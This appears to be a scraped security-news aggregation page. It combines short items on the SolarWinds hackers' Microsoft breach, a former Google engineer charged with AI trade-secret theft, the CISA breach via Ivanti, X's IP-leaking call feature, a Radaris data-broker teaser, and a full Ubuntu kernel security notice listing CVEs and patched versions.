Nobelium is responsible for the SolarWinds attack, a sophisticated 2020 supply-chain attack that compromised thousands of organizations including the major US government agencies like the Departments of Homeland Security, Defense, Justice, and Treasury.

According to Microsoft, it has found no evidence that its customer-facing systems were breached.

On Wednesday, ​the US Department of Justice announced that it was charging a former Google engineer with stealing trade secrets about artificial intelligence on behalf of two Chinese companies. Linwei Ding was arrested in Newark, California, on four counts of federal trade secret theft. If convicted he could face a decade in prison.

“Today’s charges are the latest illustration of the lengths affiliates of companies based in the People’s Republic of China are willing to go to steal American innovation,” FBI director Christopher Wray said in a statement to the Associated Press.

The indictment, unsealed Wednesday, alleges that the theft began two years ago, when Ding, a Chinese national, began uploading hundreds of company files about its data centers into a personal Google Cloud account. Soon after and unbeknownst to Google, Ding allegedly founded his own startup specializing in training large AI models while also joining a separate Chinese AI company as its CTO. He resigned from Google in December, according to the indictment.

The US Cybersecurity and Infrastructure Security Agency confirmed this week that hackers breached the agency’s systems in February, according to Recorded Future. CISA, which works to protect US critical infrastructure from cyberattacks and other threats, says it took two of its systems offline after the breach, which was carried out through vulnerabilities in Ivanti IT management software. CISA declined to comment on which systems it took offline, but Recorded Future reports that, according to unnamed sources, one “houses critical information about the interdependency of US infrastructure,” while the other “houses private sector chemical security plans.” It is unclear who the hackers are or whether they accessed or stole data from CISA systems. The agency released an advisory on February 29 warning entities that use Ivanti Connect Secure and Ivanti Policy Secure tech to patch vulnerabilities in the products.

As if getting a phone call through a social network isn’t bad enough, X’s newly released audio and video calling feature can reveal the IP address of anyone you call. Even worse: The feature is turned on by default. While IP addresses can reveal the general location of the user, they’re not precise enough to expose exact locations. Still, civil liberties organizations warn that exposing IP addresses is highly concerning for activists living under authoritarian regimes or other high-risk users. To disable X’s calling feature, go to **Settings and privacy > Privacy and safety > Direct messages** in the X app, and toggle the **Enable audio and video calling** option to off. If you want to keep the feature on but not expose your IP address, toggle on the Enhanced call privacy option, which X says will mask your IP address. Why _this_ feature is not enabled by default remains unclear.

Russian Hackers Stole Microsoft Source Code—and the Attack Isn’t Over

Ubuntu Security Notice 6686-1 - It was discovered that the DesignWare USB3 for Qualcomm SoCs driver in the Linux kernel did not properly handle certain error conditions during device registration. A local attacker could possibly use this to cause a denial of service. It was discovered that a race condition existed in the Cypress touchscreen driver in the Linux kernel during device removal, leading to a use-after- free vulnerability. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6686-1March 08, 2024linux, linux-azure, linux-azure-5.15, linux-azure-fde,linux-azure-fde-5.15, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop,linux-gkeop-5.15, linux-hwe-5.15, linux-ibm, linux-ibm-5.15,linux-lowlatency-hwe-5.15, linux-nvidia vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-nvidia: Linux kernel for NVIDIA systems- linux-azure-5.15: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde-5.15: Linux kernel for Microsoft Azure CVM cloud systems- linux-gcp-5.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop-5.15: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.15: Linux hardware enablement (HWE) kernel- linux-ibm-5.15: Linux kernel for IBM cloud systems- linux-lowlatency-hwe-5.15: Linux low latency kernelDetails:It was discovered that the DesignWare USB3 for Qualcomm SoCs driver in theLinux kernel did not properly handle certain error conditions during deviceregistration. A local attacker could possibly use this to cause a denial ofservice (system crash). (CVE-2023-22995)It was discovered that a race condition existed in the Cypress touchscreendriver in the Linux kernel during device removal, leading to a use-after-free vulnerability. A physically proximate attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-4134)黄思聪 discovered that the NFC Controller Interface (NCI) implementation inthe Linux kernel did not properly handle certain memory allocation failureconditions, leading to a null pointer dereference vulnerability. A localattacker could use this to cause a denial of service (system crash).(CVE-2023-46343)It was discovered that the io_uring subsystem in the Linux kernel containeda race condition, leading to a null pointer dereference vulnerability. Alocal attacker could use this to cause a denial of service (system crash).(CVE-2023-46862)It was discovered that a race condition existed in the Bluetooth subsystemof the Linux kernel, leading to a use-after-free vulnerability. A localattacker could use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-51779)It was discovered that a race condition existed in the Rose X.25 protocolimplementation in the Linux kernel, leading to a use-after- freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-51782)Alon Zahavi discovered that the NVMe-oF/TCP subsystem of the Linux kerneldid not properly handle connect command payloads in certain situations,leading to an out-of-bounds read vulnerability. A remote attacker could usethis to expose sensitive information (kernel memory). (CVE-2023-6121)It was discovered that the VirtIO subsystem in the Linux kernel did notproperly initialize memory in some situations. A local attacker could usethis to possibly expose sensitive information (kernel memory).(CVE-2024-0340)Dan Carpenter discovered that the netfilter subsystem in the Linux kerneldid not store data in properly sized memory locations. A local user coulduse this to cause a denial of service (system crash). (CVE-2024-0607)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-100-generic  5.15.0-100.110   linux-image-5.15.0-100-generic-64k  5.15.0-100.110   linux-image-5.15.0-100-generic-lpae  5.15.0-100.110   linux-image-5.15.0-1038-gkeop   5.15.0-1038.44   linux-image-5.15.0-1046-nvidia  5.15.0-1046.46   linux-image-5.15.0-1046-nvidia-lowlatency  5.15.0-1046.46   linux-image-5.15.0-1048-ibm     5.15.0-1048.51   linux-image-5.15.0-1052-gke     5.15.0-1052.57   linux-image-5.15.0-1053-gcp     5.15.0-1053.61   linux-image-5.15.0-1058-azure   5.15.0-1058.66   linux-image-5.15.0-1058-azure-fde  5.15.0-1058.66.1   linux-image-azure-fde-lts-22.04  5.15.0.1058.66.36   linux-image-azure-lts-22.04     5.15.0.1058.54   linux-image-gcp-lts-22.04       5.15.0.1053.49   linux-image-generic             5.15.0.100.97   linux-image-generic-64k         5.15.0.100.97   linux-image-generic-lpae        5.15.0.100.97   linux-image-gke                 5.15.0.1052.51   linux-image-gke-5.15            5.15.0.1052.51   linux-image-gkeop               5.15.0.1038.37   linux-image-gkeop-5.15          5.15.0.1038.37   linux-image-ibm                 5.15.0.1048.44   linux-image-nvidia              5.15.0.1046.46   linux-image-nvidia-lowlatency   5.15.0.1046.46   linux-image-virtual             5.15.0.100.97Ubuntu 20.04 LTS:   linux-image-5.15.0-100-generic  5.15.0-100.110~20.04.1   linux-image-5.15.0-100-generic-64k  5.15.0-100.110~20.04.1   linux-image-5.15.0-100-generic-lpae  5.15.0-100.110~20.04.1   linux-image-5.15.0-100-lowlatency  5.15.0-100.110~20.04.1   linux-image-5.15.0-100-lowlatency-64k  5.15.0-100.110~20.04.1   linux-image-5.15.0-1038-gkeop   5.15.0-1038.44~20.04.1   linux-image-5.15.0-1048-ibm     5.15.0-1048.51~20.04.1   linux-image-5.15.0-1053-gcp     5.15.0-1053.61~20.04.1   linux-image-5.15.0-1058-azure   5.15.0-1058.66~20.04.2   linux-image-5.15.0-1058-azure-fde  5.15.0-1058.66~20.04.2.1   linux-image-azure               5.15.0.1058.66~20.04.48   linux-image-azure-cvm           5.15.0.1058.66~20.04.48   linux-image-azure-fde           5.15.0.1058.66~20.04.1.36   linux-image-gcp                 5.15.0.1053.61~20.04.1   linux-image-generic-64k-hwe-20.04  5.15.0.100.110~20.04.52   linux-image-generic-hwe-20.04   5.15.0.100.110~20.04.52   linux-image-generic-lpae-hwe-20.04  5.15.0.100.110~20.04.52   linux-image-gkeop-5.15          5.15.0.1038.44~20.04.34   linux-image-ibm                 5.15.0.1048.51~20.04.20   linux-image-lowlatency-64k-hwe-20.04  5.15.0.100.110~20.04.49   linux-image-lowlatency-hwe-20.04  5.15.0.100.110~20.04.49   linux-image-oem-20.04           5.15.0.100.110~20.04.52   linux-image-oem-20.04b          5.15.0.100.110~20.04.52   linux-image-oem-20.04c          5.15.0.100.110~20.04.52   linux-image-oem-20.04d          5.15.0.100.110~20.04.52   linux-image-virtual-hwe-20.04   5.15.0.100.110~20.04.52After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6686-1   CVE-2023-22995, CVE-2023-4134, CVE-2023-46343, CVE-2023-46862,   CVE-2023-51779, CVE-2023-51782, CVE-2023-6121, CVE-2024-0340,   CVE-2024-0607Package Information:   https://launchpad.net/ubuntu/+source/linux/5.15.0-100.110   https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1058.66   https://launchpad.net/ubuntu/+source/linux-azure-fde/5.15.0-1058.66.1   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1053.61   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1052.57   https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1038.44   https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1048.51   https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1046.46   https://launchpad.net/ubuntu/+source/linux-azure-5.15/5.15.0-1058.66~20.04.2 https://launchpad.net/ubuntu/+source/linux-azure-fde-5.15/5.15.0-1058.66~20.04.2.1   https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1053.61~20.04.1   https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1038.44~20.04.1   https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-100.110~20.04.1   https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1048.51~20.04.1 https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-100.110~20.04.1

Ubuntu Security Notice USN-6686-1

If you live in the United States, the data broker Radaris likely knows a great deal about you, and they are happy to sell what they know to anyone. But how much do we know about Radaris? Publicly available data indicates that in addition to running a dizzying array of people-search websites, the co-founders of Radaris operate multiple Russian-language dating services and affiliate programs. It also appears many of their businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.

Tag

#google